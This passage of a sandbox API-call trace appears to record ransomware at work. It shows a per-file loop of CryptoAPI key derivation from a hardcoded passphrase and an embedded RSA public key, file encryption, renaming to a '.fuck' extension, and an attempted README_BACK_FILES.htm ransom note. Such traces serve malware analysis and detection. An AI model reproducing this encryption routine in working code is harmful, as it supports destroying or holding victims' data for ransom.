lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.074] CloseHandle (hObject=0xffffffff) returned 1 [0240.075] CloseHandle (hObject=0xffffffff) returned 1 [0240.075] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.075] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.075] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.076] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.077] CryptDestroyHash (hHash=0x28bf018) returned 1 [0240.077] CryptDestroyKey (hKey=0x282de78) returned 1 [0240.077] CryptReleaseContext (hProv=0x28d7070, dwFlags=0x0) returned 1 [0240.077] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.077] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.077] GetLastError () returned 0x5 [0240.077] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0240.077] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0240.078] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.078] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.079] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.079] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d7a00) returned 1 [0240.081] CryptCreateHash (in: hProv=0x28d7a00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.081] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.081] CryptHashData (hHash=0x28e8438, pbData=0x2856de0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.081] CryptDeriveKey (in: hProv=0x28d7a00, Algid=0x6610, hBaseData=0x28e8438, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e84b8) returned 1 [0240.082] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.082] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.082] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d7070) returned 1 [0240.082] CryptImportPublicKeyInfo (in: hCryptProv=0x28d7070, dwCertEncodingType=0x1, pInfo=0x28ca778*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28ca7a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28ca7b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e8878) returned 1 [0240.082] CryptEncrypt (in: hKey=0x28e8878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.082] CryptEncrypt (in: hKey=0x28e8878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3d70*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d3d70*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.082] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d3d70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.082] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.083] CryptEncrypt (in: hKey=0x28e84b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.083] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.083] CloseHandle (hObject=0xffffffff) returned 1 [0240.083] CloseHandle (hObject=0xffffffff) returned 1 [0240.083] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0240.083] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0240.084] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0240.084] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0240.084] CryptDestroyHash (hHash=0x28e8438) returned 1 [0240.084] CryptDestroyKey (hKey=0x28e84b8) returned 1 [0240.084] CryptReleaseContext (hProv=0x28d7a00, dwFlags=0x0) returned 1 [0240.085] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.085] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.085] GetLastError () returned 0x5 [0240.085] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml")) returned 0x20 [0240.085] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x80) returned 0 [0240.085] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.086] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.086] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.086] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d7a00) returned 1 [0240.089] CryptCreateHash (in: hProv=0x28d7a00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.089] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.089] CryptHashData (hHash=0x28e8a78, pbData=0x2857010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.089] CryptDeriveKey (in: hProv=0x28d7a00, Algid=0x6610, hBaseData=0x28e8a78, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e8378) returned 1 [0240.089] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.089] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.089] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d3df8) returned 1 [0240.090] CryptImportPublicKeyInfo (in: hCryptProv=0x28d3df8, dwCertEncodingType=0x1, pInfo=0x28c8218*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8248*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8250*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e8778) returned 1 [0240.090] CryptEncrypt (in: hKey=0x28e8778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.090] CryptEncrypt (in: hKey=0x28e8778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4568*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d4568*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.090] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4568, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.090] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.090] CryptEncrypt (in: hKey=0x28e8378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.090] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.090] CloseHandle (hObject=0xffffffff) returned 1 [0240.090] CloseHandle (hObject=0xffffffff) returned 1 [0240.090] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"), bFailIfExists=0) returned 0 [0240.091] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml", dwFileAttributes=0x0) returned 0 [0240.091] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.gsg")) returned 0 [0240.092] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\Power_2.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\power_2.provxml.fuck")) returned 0 [0240.092] CryptDestroyHash (hHash=0x28e8a78) returned 1 [0240.092] CryptDestroyKey (hKey=0x28e8378) returned 1 [0240.092] CryptReleaseContext (hProv=0x28d7a00, dwFlags=0x0) returned 1 [0240.092] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.092] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0240.092] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.093] AreFileApisANSI () returned 1 [0240.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.093] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.093] GetLastError () returned 0x5 [0240.093] GetLastError () returned 0x5 [0240.093] FindNextFileA (in: hFindFile=0x28bf218, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.093] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.093] GetLastError () returned 0x5 [0240.093] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml")) returned 0x20 [0240.094] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.094] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.094] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.095] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.095] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0240.098] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.098] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.098] CryptHashData (hHash=0x28e83f8, pbData=0x2857380, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.098] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e83f8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e88b8) returned 1 [0240.098] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.098] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.098] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d7868) returned 1 [0240.099] CryptImportPublicKeyInfo (in: hCryptProv=0x28d7868, dwCertEncodingType=0x1, pInfo=0x28c7b98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7bc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7bd0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e8738) returned 1 [0240.099] CryptEncrypt (in: hKey=0x28e8738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.099] CryptEncrypt (in: hKey=0x28e8738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d7a00*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d7a00*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.100] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d7a00, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.100] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.100] CryptEncrypt (in: hKey=0x28e88b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.100] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.100] CloseHandle (hObject=0xffffffff) returned 1 [0240.100] CloseHandle (hObject=0xffffffff) returned 1 [0240.100] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.100] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.101] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime.xml.gsg")) returned 0 [0240.101] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all 